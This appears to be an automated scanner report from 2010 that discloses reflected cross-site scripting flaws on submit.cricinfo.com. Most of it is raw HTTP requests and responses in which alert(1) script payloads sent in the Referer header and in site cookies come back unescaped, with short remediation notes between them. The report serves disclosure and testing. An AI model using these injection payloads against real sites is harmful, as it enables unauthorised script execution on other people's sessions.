GET /ci/content/submit/comment/usr_login.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us; Referer: http://www.google.com/search?hl=en&q=a22ce"><script>alert(1)</script>99653f53917
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:12:42 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 1324 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f392d"><script>alert(1)</script>00c65ad03a2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /ci/content/submit/member_mgmt/user_registration.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us; Referer: http://www.google.com/search?hl=en&q=f392d"><script>alert(1)</script>00c65ad03a2
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:14:52 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148354 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:14:52 ...[SNIP]... <input type="hidden" name="referer" value="http://www.google.com/search?hl=en&q=f392d"><script>alert(1)</script>00c65ad03a2"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c86d5"><script>alert(1)</script>3da25da6da3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /member_mgmt/content/submit/member_mgmt/user_registration.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us; Referer: http://www.google.com/search?hl=en&q=c86d5"><script>alert(1)</script>3da25da6da3
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:19:20 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148472 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:19:20 ...[SNIP]... <input type="hidden" name="referer" value="http://www.google.com/search?hl=en&q=c86d5"><script>alert(1)</script>3da25da6da3"> ...[SNIP]...
The value of the Q_cricinfo_cluster cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4754'-alert(1)-'d4807eabfe9 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ci/content/submit/member_mgmt/user_registration.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usaf4754'-alert(1)-'d4807eabfe9; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:12:39 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148414 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usaf4754'-alert(1)-'d4807eabfe9, ...[SNIP]... <script language="JavaScript" src="http://ad.doubleclick.net/adj/espncricinfo_global/global;kvcluster=usaf4754'-alert(1)-'d4807eabfe9;kvpt=index;kvsite=global;kvbrand=member_mgmt;tile=1;sz=728x90;ord=' + ord + '?" type="text/javascript"> ...[SNIP]...
The value of the Q_cricinfo_cluster cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbb23"><script>alert(1)</script>73ebe8053a2 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ci/content/submit/member_mgmt/user_registration.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usabbb23"><script>alert(1)</script>73ebe8053a2; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:12:35 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148489 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usabbb23"><script>alert(1)</scrip ...[SNIP]... <a href="http://ad.vulnerable.ad.partner/jump/espncricinfo_global/global;kvcluster=usabbb23"><script>alert(1)</script>73ebe8053a2;kvpt=index;kvsite=global;kvbrand=member_mgmt;tile=1;sz=728x90;ord=123456789?" target="_blank"> ...[SNIP]...
The value of the Q_cricinfo_country cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96c17'-alert(1)-'4cef5e4a3c8 was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ci/content/submit/member_mgmt/user_registration.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us96c17'-alert(1)-'4cef5e4a3c8;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:13:25 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148330 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us96c17'-alert(1)-'4cef5e4a3c8, cluster: usa, ...[SNIP]... <script language="javascript" type="text/javascript"> ord=Math.random()*10000000000000000;
The value of the Q_cricinfo_country cookie is copied into an HTML comment. The payload e70d8--><script>alert(1)</script>9c7a9f58fdc was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /ci/content/submit/member_mgmt/user_registration.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=use70d8--><script>alert(1)</script>9c7a9f58fdc;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:13:28 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148362 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: use70d8--><script>alert(1)</script>9c7a9f58fdc, cluster: usa, created: 2010-11-07 03:13:28 --> ...[SNIP]...
The value of the Q_cricinfo_cluster cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8d00"><script>alert(1)</script>f3bf3b3642a was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ci/content/submit/poll/cast_vote.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usaa8d00"><script>alert(1)</script>f3bf3b3642a; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:12:29 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 83786 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usaa8d00"><script>alert(1)</scrip ...[SNIP]... <a href="http://ad.vulnerable.ad.partner/jump/espncricinfo_global/global;kvcluster=usaa8d00"><script>alert(1)</script>f3bf3b3642a;kvpt=index;kvsite=global;kvbrand=ci;tile=1;sz=728x90;ord=123456789?" target="_blank"> ...[SNIP]...
The value of the Q_cricinfo_cluster cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9904d'-alert(1)-'218689b8227 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ci/content/submit/poll/cast_vote.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa9904d'-alert(1)-'218689b8227; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:12:33 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 83531 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usa9904d'-alert(1)-'218689b8227, ...[SNIP]... <script language="JavaScript" src="http://ad.doubleclick.net/adj/espncricinfo_global/global;kvcluster=usa9904d'-alert(1)-'218689b8227;kvpt=index;kvsite=global;kvbrand=ci;tile=1;sz=728x90;ord=' + ord + '?" type="text/javascript"> ...[SNIP]...
The value of the Q_cricinfo_country cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69125'-alert(1)-'2c7a734ccab was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ci/content/submit/poll/cast_vote.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us69125'-alert(1)-'2c7a734ccab;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:13:09 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 82875 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us69125'-alert(1)-'2c7a734ccab, cluster: usa, ...[SNIP]... <script language="javascript" type="text/javascript"> ord=Math.random()*10000000000000000;
The value of the Q_cricinfo_country cookie is copied into an HTML comment. The payload b19ab--><script>alert(1)</script>f7e4260af65 was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /ci/content/submit/poll/cast_vote.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=usb19ab--><script>alert(1)</script>f7e4260af65;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:13:12 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 82907 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: usb19ab--><script>alert(1)</script>f7e4260af65, cluster: usa, created: 2010-11-07 03:13:12 --> ...[SNIP]...
The value of the Q_cricinfo_cluster cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e37c2'-alert(1)-'56441d147b1 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /member_mgmt/content/submit/member_mgmt/user_registration.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usae37c2'-alert(1)-'56441d147b1; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:17:07 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148532 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usae37c2'-alert(1)-'56441d147b1, ...[SNIP]... <script language="JavaScript" src="http://ad.doubleclick.net/adj/espncricinfo_global/global;kvcluster=usae37c2'-alert(1)-'56441d147b1;kvpt=index;kvsite=cricinfomembermanagementservice;kvbrand=member_mgmt;tile=1;sz=728x90;ord=' + ord + '?" type="text/javascript"> ...[SNIP]...
The value of the Q_cricinfo_cluster cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3dc2"><script>alert(1)</script>9960f224455 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /member_mgmt/content/submit/member_mgmt/user_registration.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usaf3dc2"><script>alert(1)</script>9960f224455; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:17:02 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148607 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usaf3dc2"><script>alert(1)</scrip ...[SNIP]... <a href="http://ad.vulnerable.ad.partner/jump/espncricinfo_global/global;kvcluster=usaf3dc2"><script>alert(1)</script>9960f224455;kvpt=index;kvsite=cricinfomembermanagementservice;kvbrand=member_mgmt;tile=1;sz=728x90;ord=123456789?" target="_blank"> ...[SNIP]...
The value of the Q_cricinfo_country cookie is copied into an HTML comment. The payload 6c213--><script>alert(1)</script>88efb11a633 was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /member_mgmt/content/submit/member_mgmt/user_registration.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us6c213--><script>alert(1)</script>88efb11a633;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:17:56 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148480 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us6c213--><script>alert(1)</script>88efb11a633, cluster: usa, created: 2010-11-07 03:17:56 --> ...[SNIP]...
The value of the Q_cricinfo_country cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6de31'-alert(1)-'329e617c586 was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /member_mgmt/content/submit/member_mgmt/user_registration.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us6de31'-alert(1)-'329e617c586;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:17:53 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148448 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us6de31'-alert(1)-'329e617c586, cluster: usa, ...[SNIP]... <script language="javascript" type="text/javascript"> ord=Math.random()*10000000000000000;
The value of the Q_cricinfo_cluster cookie is copied into an HTML comment. The payload e4557--><script>alert(1)</script>390d9742830 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /member_mgmt/content/submit/member_mgmt/user_screenname.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usae4557--><script>alert(1)</script>390d9742830; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:16:53 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 11716 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usae4557--><script>alert(1)</script>390d9742830, created: 2010-11-07 03:16:53 --> ...[SNIP]...
The value of the Q_cricinfo_country cookie is copied into an HTML comment. The payload f68f3--><script>alert(1)</script>2111aaab520 was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /member_mgmt/content/submit/member_mgmt/user_screenname.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=usf68f3--><script>alert(1)</script>2111aaab520;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:17:09 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 11716 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: usf68f3--><script>alert(1)</script>2111aaab520, cluster: usa, created: 2010-11-07 03:17:09 --> ...[SNIP]...
Report generated by Hoyt LLC Research
at Sat Nov 13 20:17:55 CST 2010.